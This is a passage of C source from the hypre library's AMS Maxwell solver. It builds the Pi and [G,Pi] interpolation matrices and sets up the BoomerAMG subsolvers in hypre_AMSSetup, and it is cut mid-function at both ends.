Piy_diag_I[i] = G_diag_I[i];
}
for (i = 0; i < G_diag_nnz; i++)
{
Pix_diag_J[i] = G_diag_J[i];
Piy_diag_J[i] = G_diag_J[i];
}
for (i = 0; i < G_diag_nrows; i++)
for (j = G_diag_I[i]; j < G_diag_I[i+1]; j++)
{
*Pix_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gx_data[i];
*Piy_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gy_data[i];
}
}
/* Fill in the off-diagonal part */
if (dim == 3)
{
hypre_CSRMatrix *G_offd = hypre_ParCSRMatrixOffd(G);
HYPRE_Int *G_offd_I = hypre_CSRMatrixI(G_offd);
HYPRE_Int *G_offd_J = hypre_CSRMatrixJ(G_offd);
HYPRE_Real *G_offd_data = hypre_CSRMatrixData(G_offd);
HYPRE_Int G_offd_nrows = hypre_CSRMatrixNumRows(G_offd);
HYPRE_Int G_offd_ncols = hypre_CSRMatrixNumCols(G_offd);
HYPRE_Int G_offd_nnz = hypre_CSRMatrixNumNonzeros(G_offd);
hypre_CSRMatrix *Pix_offd = hypre_ParCSRMatrixOffd(Pix);
HYPRE_Int *Pix_offd_I = hypre_CSRMatrixI(Pix_offd);
HYPRE_Int *Pix_offd_J = hypre_CSRMatrixJ(Pix_offd);
HYPRE_Real *Pix_offd_data = hypre_CSRMatrixData(Pix_offd);
hypre_CSRMatrix *Piy_offd = hypre_ParCSRMatrixOffd(Piy);
HYPRE_Int *Piy_offd_I = hypre_CSRMatrixI(Piy_offd);
HYPRE_Int *Piy_offd_J = hypre_CSRMatrixJ(Piy_offd);
HYPRE_Real *Piy_offd_data = hypre_CSRMatrixData(Piy_offd);
hypre_CSRMatrix *Piz_offd = hypre_ParCSRMatrixOffd(Piz);
HYPRE_Int *Piz_offd_I = hypre_CSRMatrixI(Piz_offd);
HYPRE_Int *Piz_offd_J = hypre_CSRMatrixJ(Piz_offd);
HYPRE_Real *Piz_offd_data = hypre_CSRMatrixData(Piz_offd);
HYPRE_BigInt *G_cmap = hypre_ParCSRMatrixColMapOffd(G);
HYPRE_BigInt *Pix_cmap = hypre_ParCSRMatrixColMapOffd(Pix);
HYPRE_BigInt *Piy_cmap = hypre_ParCSRMatrixColMapOffd(Piy);
HYPRE_BigInt *Piz_cmap = hypre_ParCSRMatrixColMapOffd(Piz);
if (G_offd_ncols)
for (i = 0; i < G_offd_nrows+1; i++)
{
Pix_offd_I[i] = G_offd_I[i];
Piy_offd_I[i] = G_offd_I[i];
Piz_offd_I[i] = G_offd_I[i];
}
for (i = 0; i < G_offd_nnz; i++)
{
Pix_offd_J[i] = G_offd_J[i];
Piy_offd_J[i] = G_offd_J[i];
Piz_offd_J[i] = G_offd_J[i];
}
for (i = 0; i < G_offd_nrows; i++)
for (j = G_offd_I[i]; j < G_offd_I[i+1]; j++)
{
*Pix_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gx_data[i];
*Piy_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gy_data[i];
*Piz_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gz_data[i];
}
for (i = 0; i < G_offd_ncols; i++)
{
Pix_cmap[i] = G_cmap[i];
Piy_cmap[i] = G_cmap[i];
Piz_cmap[i] = G_cmap[i];
}
}
else
{
hypre_CSRMatrix *G_offd = hypre_ParCSRMatrixOffd(G);
HYPRE_Int *G_offd_I = hypre_CSRMatrixI(G_offd);
HYPRE_Int *G_offd_J = hypre_CSRMatrixJ(G_offd);
HYPRE_Real *G_offd_data = hypre_CSRMatrixData(G_offd);
HYPRE_Int G_offd_nrows = hypre_CSRMatrixNumRows(G_offd);
HYPRE_Int G_offd_ncols = hypre_CSRMatrixNumCols(G_offd);
HYPRE_Int G_offd_nnz = hypre_CSRMatrixNumNonzeros(G_offd);
hypre_CSRMatrix *Pix_offd = hypre_ParCSRMatrixOffd(Pix);
HYPRE_Int *Pix_offd_I = hypre_CSRMatrixI(Pix_offd);
HYPRE_Int *Pix_offd_J = hypre_CSRMatrixJ(Pix_offd);
HYPRE_Real *Pix_offd_data = hypre_CSRMatrixData(Pix_offd);
hypre_CSRMatrix *Piy_offd = hypre_ParCSRMatrixOffd(Piy);
HYPRE_Int *Piy_offd_I = hypre_CSRMatrixI(Piy_offd);
HYPRE_Int *Piy_offd_J = hypre_CSRMatrixJ(Piy_offd);
HYPRE_Real *Piy_offd_data = hypre_CSRMatrixData(Piy_offd);
HYPRE_BigInt *G_cmap = hypre_ParCSRMatrixColMapOffd(G);
HYPRE_BigInt *Pix_cmap = hypre_ParCSRMatrixColMapOffd(Pix);
HYPRE_BigInt *Piy_cmap = hypre_ParCSRMatrixColMapOffd(Piy);
if (G_offd_ncols)
for (i = 0; i < G_offd_nrows+1; i++)
{
Pix_offd_I[i] = G_offd_I[i];
Piy_offd_I[i] = G_offd_I[i];
}
for (i = 0; i < G_offd_nnz; i++)
{
Pix_offd_J[i] = G_offd_J[i];
Piy_offd_J[i] = G_offd_J[i];
}
for (i = 0; i < G_offd_nrows; i++)
for (j = G_offd_I[i]; j < G_offd_I[i+1]; j++)
{
*Pix_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gx_data[i];
*Piy_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gy_data[i];
}
for (i = 0; i < G_offd_ncols; i++)
{
Pix_cmap[i] = G_cmap[i];
Piy_cmap[i] = G_cmap[i];
}
}
}
*Pix_ptr = Pix;
*Piy_ptr = Piy;
if (dim == 3)
*Piz_ptr = Piz;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSComputeGPi
*
* Construct the matrix [G,Pi] which can be considered an interpolation
* matrix from S_h^4 (4 copies of the scalar linear finite element space)
* to the edge finite elements space.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSComputeGPi(hypre_ParCSRMatrix *A,
hypre_ParCSRMatrix *G,
hypre_ParVector *Gx,
hypre_ParVector *Gy,
hypre_ParVector *Gz,
HYPRE_Int dim,
hypre_ParCSRMatrix **GPi_ptr)
{
hypre_ParCSRMatrix *GPi;
/* Take into account G */
dim++;
/* Compute GPi = [Pi_x, Pi_y, Pi_z, G] */
{
HYPRE_Int i, j, d;
HYPRE_Real *Gx_data, *Gy_data, *Gz_data = NULL; /* Gz unused for 2D problems */
MPI_Comm comm = hypre_ParCSRMatrixComm(G);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(G);
HYPRE_BigInt global_num_cols = dim*hypre_ParCSRMatrixGlobalNumCols(G);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(G);
HYPRE_BigInt *col_starts;
HYPRE_Int col_starts_size;
HYPRE_Int num_cols_offd = dim*hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(G));
HYPRE_Int num_nonzeros_diag = dim*hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(G));
HYPRE_Int num_nonzeros_offd = dim*hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(G));
HYPRE_BigInt *col_starts_G = hypre_ParCSRMatrixColStarts(G);
col_starts_size = 2;
col_starts = hypre_TAlloc(HYPRE_BigInt, col_starts_size, HYPRE_MEMORY_HOST);
for (i = 0; i < col_starts_size; i++)
col_starts[i] = (HYPRE_BigInt) dim * col_starts_G[i];
GPi = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(GPi) = 1;
hypre_ParCSRMatrixOwnsRowStarts(GPi) = 0;
hypre_ParCSRMatrixOwnsColStarts(GPi) = 1;
hypre_ParCSRMatrixInitialize(GPi);
Gx_data = hypre_VectorData(hypre_ParVectorLocalVector(Gx));
Gy_data = hypre_VectorData(hypre_ParVectorLocalVector(Gy));
if (dim == 4)
Gz_data = hypre_VectorData(hypre_ParVectorLocalVector(Gz));
/* Fill in the diagonal part */
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
HYPRE_Int *G_diag_I = hypre_CSRMatrixI(G_diag);
HYPRE_Int *G_diag_J = hypre_CSRMatrixJ(G_diag);
HYPRE_Real *G_diag_data = hypre_CSRMatrixData(G_diag);
HYPRE_Int G_diag_nrows = hypre_CSRMatrixNumRows(G_diag);
HYPRE_Int G_diag_nnz = hypre_CSRMatrixNumNonzeros(G_diag);
hypre_CSRMatrix *GPi_diag = hypre_ParCSRMatrixDiag(GPi);
HYPRE_Int *GPi_diag_I = hypre_CSRMatrixI(GPi_diag);
HYPRE_Int *GPi_diag_J = hypre_CSRMatrixJ(GPi_diag);
HYPRE_Real *GPi_diag_data = hypre_CSRMatrixData(GPi_diag);
for (i = 0; i < G_diag_nrows+1; i++)
GPi_diag_I[i] = dim * G_diag_I[i];
for (i = 0; i < G_diag_nnz; i++)
for (d = 0; d < dim; d++)
GPi_diag_J[dim*i+d] = dim*G_diag_J[i]+d;
for (i = 0; i < G_diag_nrows; i++)
for (j = G_diag_I[i]; j < G_diag_I[i+1]; j++)
{
*GPi_diag_data++ = G_diag_data[j];
*GPi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gx_data[i];
*GPi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gy_data[i];
if (dim == 4)
*GPi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gz_data[i];
}
}
/* Fill in the off-diagonal part */
{
hypre_CSRMatrix *G_offd = hypre_ParCSRMatrixOffd(G);
HYPRE_Int *G_offd_I = hypre_CSRMatrixI(G_offd);
HYPRE_Int *G_offd_J = hypre_CSRMatrixJ(G_offd);
HYPRE_Real *G_offd_data = hypre_CSRMatrixData(G_offd);
HYPRE_Int G_offd_nrows = hypre_CSRMatrixNumRows(G_offd);
HYPRE_Int G_offd_ncols = hypre_CSRMatrixNumCols(G_offd);
HYPRE_Int G_offd_nnz = hypre_CSRMatrixNumNonzeros(G_offd);
hypre_CSRMatrix *GPi_offd = hypre_ParCSRMatrixOffd(GPi);
HYPRE_Int *GPi_offd_I = hypre_CSRMatrixI(GPi_offd);
HYPRE_Int *GPi_offd_J = hypre_CSRMatrixJ(GPi_offd);
HYPRE_Real *GPi_offd_data = hypre_CSRMatrixData(GPi_offd);
HYPRE_BigInt *G_cmap = hypre_ParCSRMatrixColMapOffd(G);
HYPRE_BigInt *GPi_cmap = hypre_ParCSRMatrixColMapOffd(GPi);
if (G_offd_ncols)
for (i = 0; i < G_offd_nrows+1; i++)
GPi_offd_I[i] = dim * G_offd_I[i];
for (i = 0; i < G_offd_nnz; i++)
for (d = 0; d < dim; d++)
GPi_offd_J[dim*i+d] = dim*G_offd_J[i]+d;
for (i = 0; i < G_offd_nrows; i++)
for (j = G_offd_I[i]; j < G_offd_I[i+1]; j++)
{
*GPi_offd_data++ = G_offd_data[j];
*GPi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gx_data[i];
*GPi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gy_data[i];
if (dim == 4)
*GPi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gz_data[i];
}
for (i = 0; i < G_offd_ncols; i++)
for (d = 0; d < dim; d++)
GPi_cmap[dim*i+d] = dim*G_cmap[i]+d;
}
}
*GPi_ptr = GPi;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetup
*
* Construct the AMS solver components.
*
* The following functions need to be called before hypre_AMSSetup():
* - hypre_AMSSetDimension() (if solving a 2D problem)
* - hypre_AMSSetDiscreteGradient()
* - hypre_AMSSetCoordinateVectors() or hypre_AMSSetEdgeConstantVectors()
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetup(void *solver,
hypre_ParCSRMatrix *A,
hypre_ParVector *b,
hypre_ParVector *x)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
HYPRE_Int input_info = 0;
ams_data -> A = A;
/* Modifications for problems with zero-conductivity regions */
if (ams_data -> interior_nodes)
{
hypre_ParCSRMatrix *G0t, *Aorig = A;
/* Make sure that multiple Setup()+Solve() give identical results */
ams_data -> solve_counter = 0;
/* Construct the discrete gradient matrix for the zero-conductivity region
by eliminating the zero-conductivity nodes from G^t. The range of G0
represents the kernel of A, i.e. the gradients of nodal basis functions
supported in zero-conductivity regions. */
hypre_ParCSRMatrixTranspose(ams_data -> G, &G0t, 1);
{
HYPRE_Int i, j;
HYPRE_Int nv = hypre_ParCSRMatrixNumCols(ams_data -> G);
hypre_CSRMatrix *G0td = hypre_ParCSRMatrixDiag(G0t);
HYPRE_Int *G0tdI = hypre_CSRMatrixI(G0td);
HYPRE_Real *G0tdA = hypre_CSRMatrixData(G0td);
hypre_CSRMatrix *G0to = hypre_ParCSRMatrixOffd(G0t);
HYPRE_Int *G0toI = hypre_CSRMatrixI(G0to);
HYPRE_Real *G0toA = hypre_CSRMatrixData(G0to);
HYPRE_Real *interior_nodes_data = hypre_VectorData(
hypre_ParVectorLocalVector((hypre_ParVector*) ams_data -> interior_nodes));
for (i = 0; i < nv; i++)
{
if (interior_nodes_data[i] != 1)
{
for (j = G0tdI[i]; j < G0tdI[i+1]; j++)
G0tdA[j] = 0.0;
if (G0toI)
for (j = G0toI[i]; j < G0toI[i+1]; j++)
G0toA[j] = 0.0;
}
}
}
hypre_ParCSRMatrixTranspose(G0t, &ams_data -> G0, 1);
/* Construct the subspace matrix A_G0 = G0^T G0 */
ams_data -> A_G0 = hypre_ParMatmul(G0t, ams_data -> G0);
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_G0);
/* Create AMG solver for A_G0 */
HYPRE_BoomerAMGCreate(&ams_data -> B_G0);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_G0, ams_data -> B_G_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_G0, ams_data -> B_G_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_G0, ams_data -> B_G_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_G0, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_G0, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_G0, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_G0, 3); /* use just a few V-cycles */
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_G0, ams_data -> B_G_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_G0, ams_data -> B_G_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_G0, ams_data -> B_G_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_G0, 2); /* don't coarsen to 0 */
/* Generally, don't use exact solve on the coarsest level (matrix may be singular) */
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_G0, ams_data -> B_G_coarse_relax_type, 3);
HYPRE_BoomerAMGSetup(ams_data -> B_G0,
(HYPRE_ParCSRMatrix)ams_data -> A_G0,
0, 0);
/* Construct the preconditioner for ams_data->A = A + G0 G0^T.
NOTE: this can be optimized significantly by taking into account that
the sparsity pattern of A is a subset of the sparsity pattern of G0 G0^T */
{
hypre_ParCSRMatrix *A = hypre_ParMatmul(ams_data -> G0, G0t);
hypre_ParCSRMatrix *B = Aorig;
hypre_ParCSRMatrix **C_ptr = &ams_data -> A;
hypre_ParCSRMatrix *C;
HYPRE_Real factor, lfactor;
/* scale (penalize) G0 G0^T before adding it to the matrix */
{
HYPRE_Int i;
HYPRE_Int B_num_rows = hypre_CSRMatrixNumRows(hypre_ParCSRMatrixDiag(B));
HYPRE_Real *B_diag_data = hypre_CSRMatrixData(hypre_ParCSRMatrixDiag(B));
HYPRE_Real *B_offd_data = hypre_CSRMatrixData(hypre_ParCSRMatrixOffd(B));
HYPRE_Int *B_diag_i = hypre_CSRMatrixI(hypre_ParCSRMatrixDiag(B));
HYPRE_Int *B_offd_i = hypre_CSRMatrixI(hypre_ParCSRMatrixOffd(B));
lfactor = -1;
for (i = 0; i < B_diag_i[B_num_rows]; i++)
if (fabs(B_diag_data[i]) > lfactor)
lfactor = fabs(B_diag_data[i]);
for (i = 0; i < B_offd_i[B_num_rows]; i++)
if (fabs(B_offd_data[i]) > lfactor)
lfactor = fabs(B_offd_data[i]);
lfactor *= 1e-10; /* scaling factor: max|A_ij|*1e-10 */
hypre_MPI_Allreduce(&lfactor, &factor, 1, HYPRE_MPI_REAL, hypre_MPI_MAX,
hypre_ParCSRMatrixComm(A));
}
hypre_ParcsrAdd(factor, A, 1.0, B, &C);
/*hypre_CSRMatrix *A_local, *B_local, *C_local, *C_tmp;
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(A);
HYPRE_BigInt global_num_cols = hypre_ParCSRMatrixGlobalNumCols(A);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(A);
HYPRE_BigInt *col_starts = hypre_ParCSRMatrixColStarts(A);
HYPRE_Int A_num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(A));
HYPRE_Int A_num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(A));
HYPRE_Int A_num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(A));
HYPRE_Int B_num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(B));
HYPRE_Int B_num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(B));
HYPRE_Int B_num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(B));
A_local = hypre_MergeDiagAndOffd(A);
B_local = hypre_MergeDiagAndOffd(B);*/
/* scale (penalize) G0 G0^T before adding it to the matrix */
/*{
HYPRE_Int i, nnz = hypre_CSRMatrixNumNonzeros(A_local);
HYPRE_Real *data = hypre_CSRMatrixData(A_local);
HYPRE_Real *dataB = hypre_CSRMatrixData(B_local);
HYPRE_Int nnzB = hypre_CSRMatrixNumNonzeros(B_local);
HYPRE_Real factor, lfactor;
lfactor = -1;
for (i = 0; i < nnzB; i++)
if (fabs(dataB[i]) > lfactor)
lfactor = fabs(dataB[i]);
lfactor *= 1e-10;
hypre_MPI_Allreduce(&lfactor, &factor, 1, HYPRE_MPI_REAL, hypre_MPI_MAX,
hypre_ParCSRMatrixComm(A));
for (i = 0; i < nnz; i++)
data[i] *= factor;
}
C_tmp = hypre_CSRMatrixBigAdd(A_local, B_local);
C_local = hypre_CSRMatrixBigDeleteZeros(C_tmp,0.0);
if (C_local)
hypre_CSRMatrixDestroy(C_tmp);
else
C_local = C_tmp;
C = hypre_ParCSRMatrixCreate (comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
A_num_cols_offd + B_num_cols_offd,
A_num_nonzeros_diag + B_num_nonzeros_diag,
A_num_nonzeros_offd + B_num_nonzeros_offd);
GenerateDiagAndOffd(C_local, C,
hypre_ParCSRMatrixFirstColDiag(A),
hypre_ParCSRMatrixLastColDiag(A));
hypre_ParCSRMatrixOwnsRowStarts(C) = 0;
hypre_ParCSRMatrixOwnsColStarts(C) = 1;
hypre_ParCSRMatrixOwnsColStarts(G0t) = 0;
hypre_CSRMatrixDestroy(A_local);
hypre_CSRMatrixDestroy(B_local);
hypre_CSRMatrixDestroy(C_local);
*/
hypre_ParCSRMatrixDestroy(A);
*C_ptr = C;
}
hypre_ParCSRMatrixDestroy(G0t);
}
/* Make sure that the first entry in each row is the diagonal one. */
/* hypre_CSRMatrixReorder(hypre_ParCSRMatrixDiag(ams_data -> A)); */
/* Compute the l1 norm of the rows of A */
if (ams_data -> A_relax_type >= 1 && ams_data -> A_relax_type <= 4)
{
HYPRE_Real *l1_norm_data = NULL;
hypre_ParCSRComputeL1Norms(ams_data -> A, ams_data -> A_relax_type, NULL, &l1_norm_data);
ams_data -> A_l1_norms = hypre_SeqVectorCreate(hypre_ParCSRMatrixNumRows(ams_data -> A));
hypre_VectorData(ams_data -> A_l1_norms) = l1_norm_data;
hypre_SeqVectorInitialize_v2(ams_data -> A_l1_norms, hypre_ParCSRMatrixMemoryLocation(ams_data -> A));
}
/* Chebyshev? */
if (ams_data -> A_relax_type == 16)
{
hypre_ParCSRMaxEigEstimateCG(ams_data->A, 1, 10,
&ams_data->A_max_eig_est,
&ams_data->A_min_eig_est);
}
/* If not given, compute Gx, Gy and Gz */
{
if (ams_data -> x != NULL && ams_data -> y != NULL &&
(ams_data -> dim == 2 || ams_data -> z != NULL))
input_info = 1;
if (ams_data -> Gx != NULL && ams_data -> Gy != NULL &&
(ams_data -> dim == 2 || ams_data -> Gz != NULL))
input_info = 2;
if (input_info == 1)
{
ams_data -> Gx = hypre_ParVectorInRangeOf(ams_data -> G);
hypre_ParCSRMatrixMatvec (1.0, ams_data -> G, ams_data -> x, 0.0, ams_data -> Gx);
ams_data -> Gy = hypre_ParVectorInRangeOf(ams_data -> G);
hypre_ParCSRMatrixMatvec (1.0, ams_data -> G, ams_data -> y, 0.0, ams_data -> Gy);
if (ams_data -> dim == 3)
{
ams_data -> Gz = hypre_ParVectorInRangeOf(ams_data -> G);
hypre_ParCSRMatrixMatvec (1.0, ams_data -> G, ams_data -> z, 0.0, ams_data -> Gz);
}
}
}
if (ams_data -> Pi == NULL && ams_data -> Pix == NULL)
{
if (ams_data -> cycle_type == 20)
/* Construct the combined interpolation matrix [G,Pi] */
hypre_AMSComputeGPi(ams_data -> A,
ams_data -> G,
ams_data -> Gx,
ams_data -> Gy,
ams_data -> Gz,
ams_data -> dim,
&ams_data -> Pi);
else if (ams_data -> cycle_type > 10)
/* Construct Pi{x,y,z} instead of Pi = [Pix,Piy,Piz] */
hypre_AMSComputePixyz(ams_data -> A,
ams_data -> G,
ams_data -> Gx,
ams_data -> Gy,
ams_data -> Gz,
ams_data -> dim,
&ams_data -> Pix,
&ams_data -> Piy,
&ams_data -> Piz);
else
/* Construct the Pi interpolation matrix */
hypre_AMSComputePi(ams_data -> A,
ams_data -> G,
ams_data -> Gx,
ams_data -> Gy,
ams_data -> Gz,
ams_data -> dim,
&ams_data -> Pi);
}
/* Keep Gx, Gy and Gz only if we use the method with discrete divergence
stabilization (where they are needed to compute the local mesh size). */
if (input_info == 1 && ams_data -> cycle_type != 9)
{
hypre_ParVectorDestroy(ams_data -> Gx);
hypre_ParVectorDestroy(ams_data -> Gy);
if (ams_data -> dim == 3)
hypre_ParVectorDestroy(ams_data -> Gz);
}
/* Create the AMG solver on the range of G^T */
if (!ams_data -> beta_is_zero && ams_data -> cycle_type != 20)
{
HYPRE_BoomerAMGCreate(&ams_data -> B_G);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_G, ams_data -> B_G_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_G, ams_data -> B_G_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_G, ams_data -> B_G_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_G, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_G, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_G, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_G, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_G, ams_data -> B_G_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_G, ams_data -> B_G_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_G, ams_data -> B_G_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_G, 2); /* don't coarsen to 0 */
/* Generally, don't use exact solve on the coarsest level (matrix may be singular) */
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_G, ams_data -> B_G_coarse_relax_type, 3);
if (ams_data -> cycle_type == 0)
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_G, 2);
/* If not given, construct the coarse space matrix by RAP */
if (!ams_data -> A_G)
{
HYPRE_Int G_owned_col_starts;
if (!hypre_ParCSRMatrixCommPkg(ams_data -> G))
hypre_MatvecCommPkgCreate(ams_data -> G);
if (!hypre_ParCSRMatrixCommPkg(ams_data -> A))
hypre_MatvecCommPkgCreate(ams_data -> A);
G_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> G);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> G,
ams_data -> A,
ams_data -> G,
&ams_data -> A_G);
/* Make sure that A_G has no zero rows (this can happen
if beta is zero in part of the domain). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_G);
hypre_ParCSRMatrixOwnsColStarts(ams_data -> G) = G_owned_col_starts;
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_G) = 0;
ams_data -> owns_A_G = 1;
}
HYPRE_BoomerAMGSetup(ams_data -> B_G,
(HYPRE_ParCSRMatrix)ams_data -> A_G,
0, 0);
}
if (ams_data -> cycle_type > 10 && ams_data -> cycle_type != 20)
/* Create the AMG solvers on the range of Pi{x,y,z}^T */
{
HYPRE_Int P_owned_col_starts;
HYPRE_BoomerAMGCreate(&ams_data -> B_Pix);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_Pix, ams_data -> B_Pi_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_Pix, ams_data -> B_Pi_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_Pix, ams_data -> B_Pi_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_Pix, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Pix, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_Pix, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_Pix, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_Pix, ams_data -> B_Pi_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_Pix, ams_data -> B_Pi_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_Pix, ams_data -> B_Pi_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_Pix, 2);
HYPRE_BoomerAMGCreate(&ams_data -> B_Piy);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_Piy, ams_data -> B_Pi_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_Piy, ams_data -> B_Pi_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_Piy, ams_data -> B_Pi_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_Piy, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Piy, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_Piy, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_Piy, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_Piy, ams_data -> B_Pi_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_Piy, ams_data -> B_Pi_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_Piy, ams_data -> B_Pi_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_Piy, 2);
HYPRE_BoomerAMGCreate(&ams_data -> B_Piz);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_Piz, ams_data -> B_Pi_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_Piz, ams_data -> B_Pi_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_Piz, ams_data -> B_Pi_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_Piz, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Piz, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_Piz, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_Piz, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_Piz, ams_data -> B_Pi_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_Piz, ams_data -> B_Pi_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_Piz, ams_data -> B_Pi_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_Piz, 2);
/* Generally, don't use exact solve on the coarsest level (matrices may be singular) */
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_Pix, ams_data -> B_Pi_coarse_relax_type, 3);
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_Piy, ams_data -> B_Pi_coarse_relax_type, 3);
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_Piz, ams_data -> B_Pi_coarse_relax_type, 3);
if (ams_data -> cycle_type == 0)
{
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Pix, 2);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Piy, 2);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Piz, 2);
}
/* Construct the coarse space matrices by RAP */
if (!hypre_ParCSRMatrixCommPkg(ams_data -> Pix))
hypre_MatvecCommPkgCreate(ams_data -> Pix);
P_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> Pix);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Pix,
ams_data -> A,
ams_data -> Pix,
&ams_data -> A_Pix);
if (!P_owned_col_starts)
{
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_Pix) = 0;
hypre_ParCSRMatrixOwnsColStarts(ams_data -> A_Pix) = 0;
}
/* Make sure that A_Pix has no zero rows (this can happen
for some kinds of boundary conditions with contact). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_Pix);
HYPRE_BoomerAMGSetup(ams_data -> B_Pix,
